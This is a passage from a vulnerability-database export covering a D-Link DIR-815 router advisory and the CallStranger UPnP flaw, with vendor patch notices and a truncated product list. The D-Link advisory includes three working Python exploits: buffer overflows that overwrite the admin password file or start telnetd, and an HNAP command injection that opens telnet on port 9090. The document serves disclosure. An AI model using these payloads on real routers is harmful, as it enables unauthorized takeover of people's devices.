"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link is an internationally renowned provider of network equipment and solutions, including a variety of router equipment. D-Link is a D-Link company dedicated to the research, development, production and marketing of local area networks, broadband networks, wireless networks, voice networks and related network equipment. \nA buffer overflow vulnerability exists in D-Link due to the program not performing correct boundary checks on user-submitted input. An attacker could use this vulnerability to execute arbitrary code in the context of an affected device and may also cause a denial of service. The following products are affected: D-Link Ethernet Broadband Router. ## Advisory Information\n\nTitle: DIR-815 Buffer overflows and Command injection in authentication and HNAP functionalities\nVendors contacted: William Brown \u003cwilliam.brown@dlink.com\u003e, Patrick Cline patrick.cline@dlink.com(Dlink)\nCVE: None\n\nNote: All these security issues have been discussed with the vendor and vendor indicated that they have fixed issues as per the email communication. The vendor had also released the information on their security advisory pages http://securityadvisories.dlink.com/security/publication.aspx?name=SAP10060, \nhttp://securityadvisories.dlink.com/security/publication.aspx?name=SAP10061\n\nHowever, the vendor has taken now the security advisory pages down and hence the information needs to be publicly accessible so that users using these devices can update the router firmwares. The author (Samuel Huntley) releasing this finding is not responsible for anyone using this information for malicious purposes. \n\n## Product Description\n\nDIR-815 -- Wireless N300 Dual Band Router. Mainly used by home and small offices. \n\n## Vulnerabilities Summary\n\nHave come across 3 security issues in DIR-815 firmware which allows an attacker to exploit command injection and buffer overflows in authentication adn HNAP functionality. 
All of them can be exploited by an unauthentictaed attacker. The attacker can be on wireless LAN or WAN if mgmt interface is exposed to attack directly or using XSRF if not exposed. \n\n## Details\n\nBuffer overflow in auth \n----------------------------------------------------------------------------------------------------------------------\nimport urllib\nimport urllib2\n\n# This exploits the auth_main.cgi with read buffer overflow exploit for v2.02\n# prequisite is just to have id and password fields in params\n\nurl = \u0027http://192.168.0.1/authentication.cgi\u0027\njunk = \"A\"*1004+\"B\"*37+\"\\x58\\xf8\\x40\\x00\" # address of system function in executable\njunk+=\"X\"*164+\u0027echo \"Admin\" \"Admin\" \"0\" \u003e /var/passwd\\x00\u0027+\"AAAA\"\nvalues = \"id=test\u0026password=test\u0026test=\"+junk\n\n\nreq = urllib2.Request(url, values)\nresponse = urllib2.urlopen(req)\nthe_page = response.read()\n\n----------------------------------------------------------------------------------------------------------------------\n\nBuffer overflow in HNAP\n----------------------------------------------------------------------------------------------------------------------\nimport socket\nimport struct\n\n\n# format junk+ROP1(have right value in A0) + ROP2(add or subtract to create right system address) + ROP3(Jump to right address)\n\nbuf = \"POST /HNAP1/ HTTP/1.0\\r\\nHOST: 192.168.1.8\\r\\nUser-Agent: test\\r\\nContent-Length: 1\\r\\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX\" + \";sh;\"+\"H\"*286 \nbuf+= \"\\x40\\xF4\\xB1\\x2A\" # (ROP gadget which puts right value in A0)\nbuf+= \"B\"*20+\"ZZZZ\"+\"telnetd -p 6778\"+\"C\"*5 # adjustment to get to the right payload\nbuf+=\"\\xA0\\xb2\\xb4\\x2a\" # The system address is 2Ab4b200 so changing that in GDB just before jumping to test if it works which it does not\nbuf+= \"\\r\\n\" + \"1\\r\\n\\r\\n\"\n \nprint \"[+] sending buffer size\", len(buf)\ns = socket.socket(socket.AF_INET, 
socket.SOCK_STREAM)\ns.connect((\"1.2.3.4\", 80))\ns.send(buf)\n\n\n----------------------------------------------------------------------------------------------------------------------\n\nCommand injection in \n----------------------------------------------------------------------------------------------------------------------\nimport socket\nimport struct\n\n# CSRF or any other trickery, but probably only works when connected to network I suppose \n\nbuf = \"POST /HNAP1/ HTTP/1.0\\r\\nHOST: 99.249.143.124\\r\\nUser-Agent: test\\r\\nContent-Length: 1\\r\\nSOAPAction:http://purenetworks.com/HNAP1/GetDeviceSettings/XX\" + \u0027;telnetd -p 9090;\\r\\n\u0027 + \"1\\r\\n\\r\\n\"\n \nprint \"[+] sending buffer size\", len(buf)\ns = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\ns.connect((\"192.168.0.1\", 80))\ns.send(buf)\n\n----------------------------------------------------------------------------------------------------------------------\n\n## Report Timeline\n\n* April 26, 2015: Vulnerability found by Samuel Huntley and reported to William Brown and Patrick Cline. \n* July 17, 2015: Vulnerability was fixed by Dlink as per the email sent by the vendor\n* Nov 13, 2015: A public advisory is sent to security mailing lists. \n\n## Credit\n\nThis vulnerability was found by Samuel Huntley (samhuntley84@gmail.com)",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-05077"
},
{
"db": "CNVD",
"id": "CNVD-2015-05076"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-010"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-011"
},
{
"db": "PACKETSTORM",
"id": "134368"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "BID",
"id": "76012",
"trust": 1.2
},
{
"db": "BID",
"id": "76014",
"trust": 1.2
},
{
"db": "CNVD",
"id": "CNVD-2015-05077",
"trust": 0.6
},
{
"db": "CNVD",
"id": "CNVD-2015-05076",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201508-010",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201508-011",
"trust": 0.6
},
{
"db": "DLINK",
"id": "SAP10061",
"trust": 0.1
},
{
"db": "DLINK",
"id": "SAP10060",
"trust": 0.1
},
{
"db": "PACKETSTORM",
"id": "134368",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-05077"
},
{
"db": "CNVD",
"id": "CNVD-2015-05076"
},
{
"db": "PACKETSTORM",
"id": "134368"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-010"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-011"
}
]
},
"id": "VAR-201507-0645",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-05077"
},
{
"db": "CNVD",
"id": "CNVD-2015-05076"
}
],
"trust": 2.2
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 1.2
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-05077"
},
{
"db": "CNVD",
"id": "CNVD-2015-05076"
}
]
},
"last_update_date": "2024-07-23T22:41:18.832000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Patch for multiple D-Link product UPnP buffer overflow vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/61829"
},
{
"title": "Patch for multiple D-Link product HTTP buffer overflow vulnerabilities",
"trust": 0.6,
"url": "https://www.cnvd.org.cn/patchinfo/show/61827"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-05077"
},
{
"db": "CNVD",
"id": "CNVD-2015-05076"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 1.2,
"url": "http://www.securityfocus.com/bid/76012"
},
{
"trust": 1.2,
"url": "http://www.securityfocus.com/bid/76014"
},
{
"trust": 0.1,
"url": "http://securityadvisories.dlink.com/security/publication.aspx?name=sap10060,"
},
{
"trust": 0.1,
"url": "http://securityadvisories.dlink.com/security/publication.aspx?name=sap10061"
},
{
"trust": 0.1,
"url": "http://192.168.0.1/authentication.cgi\u0027"
},
{
"trust": 0.1,
"url": "http://purenetworks.com/hnap1/getdevicesettings/xx\""
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-05077"
},
{
"db": "CNVD",
"id": "CNVD-2015-05076"
},
{
"db": "PACKETSTORM",
"id": "134368"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-010"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-011"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2015-05077"
},
{
"db": "CNVD",
"id": "CNVD-2015-05076"
},
{
"db": "PACKETSTORM",
"id": "134368"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-010"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-011"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-08-03T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-05077"
},
{
"date": "2015-08-03T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-05076"
},
{
"date": "2015-11-16T17:32:23",
"db": "PACKETSTORM",
"id": "134368"
},
{
"date": "2015-07-23T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201508-010"
},
{
"date": "2015-07-17T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201508-011"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2015-08-03T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-05077"
},
{
"date": "2015-08-03T00:00:00",
"db": "CNVD",
"id": "CNVD-2015-05076"
},
{
"date": "2015-08-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201508-010"
},
{
"date": "2015-08-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201508-011"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201508-010"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-011"
}
],
"trust": 1.2
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Multiple D-Link Product UPnP Buffer Overflow Vulnerabilities",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2015-05077"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer overflow",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201508-010"
},
{
"db": "CNNVD",
"id": "CNNVD-201508-011"
}
],
"trust": 1.2
}
}
VAR-202006-0391
Vulnerability from variot - Updated: 2024-07-23 21:20
The Open Connectivity Foundation UPnP specification before 2020-04-17 does not forbid the acceptance of a subscription request with a delivery URL on a different network segment than the fully qualified event-subscription URL, aka the CallStranger issue. The Universal Plug and Play (UPnP) protocol in effect prior to April 17, 2020 can be abused to send traffic to arbitrary destinations using the SUBSCRIBE functionality. The UPnP protocol, as specified by the Open Connectivity Foundation (OCF), is designed to provide automatic discovery and interaction with devices on a network. The UPnP protocol is designed to be used in a trusted local area network (LAN) and the protocol does not implement any form of authentication or verification. Many common Internet-connected devices support UPnP, as noted in previous research from Daniel Garcia (VU#357851) and Rapid7. Garcia presented at DEFCON 2019 and published a scanning and portmapping tool. The UPnP Device Protection service was not widely adopted. A vulnerability in the UPnP SUBSCRIBE capability permits an attacker to send large amounts of data to arbitrary destinations accessible over the Internet, which could lead to a Distributed Denial of Service (DDoS), data exfiltration, and other unexpected network behavior. The OCF has updated the UPnP specification to address this issue. This vulnerability has been assigned CVE-2020-12695 and is also known as Call Stranger. Although offering UPnP services on the Internet is generally considered to be a misconfiguration, a number of devices are still available over the Internet according to a recent Shodan scan. A remote, unauthenticated attacker may be able to abuse the UPnP SUBSCRIBE capability to send traffic to arbitrary destinations, leading to amplified DDoS attacks and data exfiltration.
In general, making UPnP available over the Internet can expose further security vulnerabilities beyond the one described in this vulnerability note. The Open Connectivity Foundation UPnP specification contains a vulnerability related to improper default permissions. Information may be obtained and service operation may be interrupted (DoS). A security vulnerability exists in UPnP versions prior to 2020-04-17. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA256
====================================================================
Red Hat Security Advisory
Synopsis: Moderate: gssdp and gupnp security update Advisory ID: RHSA-2021:1789-01 Product: Red Hat Enterprise Linux Advisory URL: https://access.redhat.com/errata/RHSA-2021:1789 Issue date: 2021-05-18 CVE Names: CVE-2020-12695 ==================================================================== 1. Summary:
An update for gssdp and gupnp is now available for Red Hat Enterprise Linux 8.
Red Hat Product Security has rated this update as having a security impact of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available for each vulnerability from the CVE link(s) in the References section.
- Relevant releases/architectures:
Red Hat CodeReady Linux Builder (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64 Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64
- Description:
GUPnP is an object-oriented open source framework for creating UPnP devices and control points, written in C using GObject and libsoup. The GUPnP API is intended to be easy to use, efficient and flexible.
GSSDP implements resource discovery and announcement over SSDP and is part of gUPnP.
The following packages have been upgraded to a later upstream version: gssdp (1.0.5), gupnp (1.0.6). (BZ#1846589, BZ#1861928)
Security Fix(es):
- hostapd: UPnP SUBSCRIBE misbehavior in WPS AP (CVE-2020-12695)
For more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.
Additional Changes:
For detailed information on changes in this release, see the Red Hat Enterprise Linux 8.4 Release Notes linked from the References section.
- Solution:
For details on how to apply this update, which includes the changes described in this advisory, refer to:
https://access.redhat.com/articles/11258
- Bugs fixed (https://bugzilla.redhat.com/):
1846006 - CVE-2020-12695 hostapd: UPnP SUBSCRIBE misbehavior in WPS AP
- Package List:
Red Hat Enterprise Linux AppStream (v. 8):
Source: gssdp-1.0.5-1.el8.src.rpm gupnp-1.0.6-1.el8.src.rpm
aarch64: gssdp-1.0.5-1.el8.aarch64.rpm gssdp-debuginfo-1.0.5-1.el8.aarch64.rpm gssdp-debugsource-1.0.5-1.el8.aarch64.rpm gssdp-utils-debuginfo-1.0.5-1.el8.aarch64.rpm gupnp-1.0.6-1.el8.aarch64.rpm gupnp-debuginfo-1.0.6-1.el8.aarch64.rpm gupnp-debugsource-1.0.6-1.el8.aarch64.rpm
ppc64le: gssdp-1.0.5-1.el8.ppc64le.rpm gssdp-debuginfo-1.0.5-1.el8.ppc64le.rpm gssdp-debugsource-1.0.5-1.el8.ppc64le.rpm gssdp-utils-debuginfo-1.0.5-1.el8.ppc64le.rpm gupnp-1.0.6-1.el8.ppc64le.rpm gupnp-debuginfo-1.0.6-1.el8.ppc64le.rpm gupnp-debugsource-1.0.6-1.el8.ppc64le.rpm
s390x: gssdp-1.0.5-1.el8.s390x.rpm gssdp-debuginfo-1.0.5-1.el8.s390x.rpm gssdp-debugsource-1.0.5-1.el8.s390x.rpm gssdp-utils-debuginfo-1.0.5-1.el8.s390x.rpm gupnp-1.0.6-1.el8.s390x.rpm gupnp-debuginfo-1.0.6-1.el8.s390x.rpm gupnp-debugsource-1.0.6-1.el8.s390x.rpm
x86_64: gssdp-1.0.5-1.el8.i686.rpm gssdp-1.0.5-1.el8.x86_64.rpm gssdp-debuginfo-1.0.5-1.el8.i686.rpm gssdp-debuginfo-1.0.5-1.el8.x86_64.rpm gssdp-debugsource-1.0.5-1.el8.i686.rpm gssdp-debugsource-1.0.5-1.el8.x86_64.rpm gssdp-utils-debuginfo-1.0.5-1.el8.i686.rpm gssdp-utils-debuginfo-1.0.5-1.el8.x86_64.rpm gupnp-1.0.6-1.el8.i686.rpm gupnp-1.0.6-1.el8.x86_64.rpm gupnp-debuginfo-1.0.6-1.el8.i686.rpm gupnp-debuginfo-1.0.6-1.el8.x86_64.rpm gupnp-debugsource-1.0.6-1.el8.i686.rpm gupnp-debugsource-1.0.6-1.el8.x86_64.rpm
Red Hat CodeReady Linux Builder (v. 8):
aarch64: gssdp-debuginfo-1.0.5-1.el8.aarch64.rpm gssdp-debugsource-1.0.5-1.el8.aarch64.rpm gssdp-devel-1.0.5-1.el8.aarch64.rpm gssdp-utils-debuginfo-1.0.5-1.el8.aarch64.rpm gupnp-debuginfo-1.0.6-1.el8.aarch64.rpm gupnp-debugsource-1.0.6-1.el8.aarch64.rpm gupnp-devel-1.0.6-1.el8.aarch64.rpm
noarch: gssdp-docs-1.0.5-1.el8.noarch.rpm
ppc64le: gssdp-debuginfo-1.0.5-1.el8.ppc64le.rpm gssdp-debugsource-1.0.5-1.el8.ppc64le.rpm gssdp-devel-1.0.5-1.el8.ppc64le.rpm gssdp-utils-debuginfo-1.0.5-1.el8.ppc64le.rpm gupnp-debuginfo-1.0.6-1.el8.ppc64le.rpm gupnp-debugsource-1.0.6-1.el8.ppc64le.rpm gupnp-devel-1.0.6-1.el8.ppc64le.rpm
s390x: gssdp-debuginfo-1.0.5-1.el8.s390x.rpm gssdp-debugsource-1.0.5-1.el8.s390x.rpm gssdp-devel-1.0.5-1.el8.s390x.rpm gssdp-utils-debuginfo-1.0.5-1.el8.s390x.rpm gupnp-debuginfo-1.0.6-1.el8.s390x.rpm gupnp-debugsource-1.0.6-1.el8.s390x.rpm gupnp-devel-1.0.6-1.el8.s390x.rpm
x86_64: gssdp-debuginfo-1.0.5-1.el8.i686.rpm gssdp-debuginfo-1.0.5-1.el8.x86_64.rpm gssdp-debugsource-1.0.5-1.el8.i686.rpm gssdp-debugsource-1.0.5-1.el8.x86_64.rpm gssdp-devel-1.0.5-1.el8.i686.rpm gssdp-devel-1.0.5-1.el8.x86_64.rpm gssdp-utils-debuginfo-1.0.5-1.el8.i686.rpm gssdp-utils-debuginfo-1.0.5-1.el8.x86_64.rpm gupnp-debuginfo-1.0.6-1.el8.i686.rpm gupnp-debuginfo-1.0.6-1.el8.x86_64.rpm gupnp-debugsource-1.0.6-1.el8.i686.rpm gupnp-debugsource-1.0.6-1.el8.x86_64.rpm gupnp-devel-1.0.6-1.el8.i686.rpm gupnp-devel-1.0.6-1.el8.x86_64.rpm
These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/
- References:
https://access.redhat.com/security/cve/CVE-2020-12695 https://access.redhat.com/security/updates/classification/#moderate https://access.redhat.com/documentation/en-us/red_hat_enterprise_linux/8/html/8.4_release_notes/
- Contact:
The Red Hat security contact is secalert@redhat.com. More contact details at https://access.redhat.com/security/team/contact/
Copyright 2021 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1
iQIVAwUBYKPxUtzjgjWX9erEAQhZhw//Ypgq/0qu2SS/hw8alPmqQ6CG5C/xOqF6 uJL5HVQ+KPu8Go+UifB3xP3Izm9GYh9aNpcR3bPTx3NsfJdQyzPNSo8O2bC3mUBl Lw6Bh++uhaNx3ADaKfceEG5teXbkwAadSft0W7j9jiY70qjVWfvqKjzBS3UyOL/P ++SdPU96uOX9nAkeT3wqirWjXDjUMJLao6AvRtXOXJ2MNwJp436S/KemSkMq2Mg7 izSYf7Biojg5SMNM4rsFBSnIqmehomfsVFetttHImCfTYteTfddti42gMelZyG8k MK4CJw1DeR1e30teWaHnoVa9xAPJMKx56RG3/Wr+6Y5nK0rFZoZuMiJn2b7KodcH fYbfxkwrQQ/R9bYZn03YgCz4zl/hetsoITKFHcsPNB9qtdRdtQhYzeOG+AyiawWh YtF3vlomMlaxuOZV9zTJUIWZX/ev6wWx8VsXuHKMBwtBxO7l3M0Hd+BOxRPVE/mu m+DBcBQp7fvaw55tCAQtHS3CKvgGYijDvOFHBOkQw5Zh9ttdfLlKo4H4NU0W4dLN HJWuKGelB2vGc0eoqZ7yCi2xuWBYxjDIoYGzlwPJSnrrguqeLfOKVykja8AYpIET V/XCUk/geIiEbSRwAR8EPXDpTLLicGrR6pbekpMfALm/GGc5I4RyA9AbVNJ9fF+a 7bb2GlcOcWo=2GSN -----END PGP SIGNATURE-----
-- RHSA-announce mailing list RHSA-announce@redhat.com https://listman.redhat.com/mailman/listinfo/rhsa-announce . (CVE-2020-12695)
It was discovered that ReadyMedia (MiniDLNA) allowed remote code execution. ========================================================================= Ubuntu Security Notice USN-4734-2 February 16, 2021
wpa vulnerabilities
A security issue affects these releases of Ubuntu and its derivatives:
- Ubuntu 14.04 ESM
Summary:
Several security issues were fixed in wpa_supplicant and hostapd.
Software Description: - wpa: client support for WPA and WPA2
Details:
USN-4734-1 fixed several vulnerabilities in wpa_supplicant. This update provides the corresponding update for Ubuntu 14.04 ESM.
It was discovered that wpa_supplicant did not properly handle P2P (Wi-Fi Direct) group information in some situations, leading to a heap overflow. A physically proximate attacker could use this to cause a denial of service or possibly execute arbitrary code. (CVE-2021-0326)
It was discovered that hostapd did not properly handle UPnP subscribe messages in some circumstances. An attacker could use this to cause a denial of service. (CVE-2020-12695)
Update instructions:
The problem can be corrected by updating your system to the following package versions:
Ubuntu 14.04 ESM: hostapd 1:2.1-0ubuntu1.7+esm3 wpasupplicant 2.1-0ubuntu1.7+esm3
After a standard system update you need to reboot your computer to make all the necessary changes.
For the stable distribution (buster), these problems have been fixed in version 2:2.7+git20190128+0c1e29f-6+deb10u3.
We recommend that you upgrade your wpa packages.
For the detailed security status of wpa please refer to its security tracker page at: https://security-tracker.debian.org/tracker/wpa
Further information about Debian Security Advisories, how to apply these updates to your system and frequently asked questions can be found at: https://www.debian.org/security/
Mailing list: debian-security-announce@lists.debian.org -----BEGIN PGP SIGNATURE-----
iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmCBxcZfFIAAAAAALgAo aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2 NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xND z0QRbw//chJxW9vhszfe/MrHkuEBC/y0jzkQ0GxJG/DT+EXvHnq8KyVht92B81sU Ia860UeNygOY1vAe8izNVpxPEi1PpI7Y6VfvqcWC5dMFNEmOk8yMzJXPDYtwrO3b q7Fq6MJys6HTooIInCVjdwVTmvVfocEiOl2Oy+smBE8ylkUPIShJj+UsnBR3qMCB 9IoxgeFsHl4HpRzsC1uiTMmNPUqqychqzyn26aA+Vp5nfPkvpsSc6aA68BBUm529 5udANpQneYrsQ+EKMm2wQmw9xNWbrqzRUCmi/XGxJ5YEibOjMLZeBMWq35MRQKDS BaaEPbjPMbBP7p6yp795pdt/XgNL1cJPejEBBQWPs3PrRuW/inhjJbSvenPl5AIB wOV8OzoxDw0m5DdYr2IuYRNu3zt743e/v5oDhDOiSteBl7zjs4cUohfOryaH/htN 7Ok3BbhfVc7xfW/XhXNq2axXPGDdSOI3Y6ZXPgiTlX3eIm8Culg7Rm52JprbAc0a aP0pkGjHO3MAIsvRU/H7WGJbhCdS0i/XTAbuJming5zzCpigGaQG9wOawYH4lNJV BNEX/DjjcsZ4oETxWn0sG/LVIl3m2TCry2cayZsy8806nTqlhFS2py5tx6gn5NBi e5JGaYRgwa6TUxj4UjWnbdIKMpElbtXbMIOHSvG2Gnx/21siyg0= =CU/j -----END PGP SIGNATURE----- . In addition minidlna was susceptible to the "CallStranger" UPnP vulnerability
{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-202006-0391",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "envy photo 7100 z3m52a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "windows 10",
"scope": "eq",
"trust": 1.0,
"vendor": "microsoft",
"version": null
},
{
"model": "deskjet ink advantage 4538 f0v66b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 7640",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy pro 6452 5se47a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "5020 z4a69a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 6055 5se16a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy photo 6232 k7g26b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 110 cq809c",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 120 cz022c",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4500 a9t80a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4525 k9t09b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 5541 k7g89a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy photo 6222 y0k13d",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4516 k9h52a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy pro 6420 5se45b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 5646 f8b05a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4505 a9t86a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "officejet 4652 k9v84b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "officejet 4652 f1j02a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 6540 b9s59a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "deskjet ink advantage 3545 a9t81a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "fedora",
"scope": "eq",
"trust": 1.0,
"vendor": "fedoraproject",
"version": "32"
},
{
"model": "xp-702",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"model": "envy 4507 e6g70b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy photo 7100 k7g93a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4508 e6g72b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 4520 e6g67b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 111 cq810a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy photo 6234 k7s21b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy photo 7800 k7r96a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy 7645 e4w44a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "deskjet ink advantage 4675 f1h97c",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "officejet 4652 f1j05b",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "xp-960",
"scope": "eq",
"trust": 1.0,
"vendor": "epson",
"version": null
},
{
"model": "dvg-n5412sp",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": null
},
{
"model": "5034 z4a74a",
"scope": "eq",
"trust": 1.0,
"vendor": "hp",
"version": null
},
{
"model": "envy photo 6200 k7g26b",
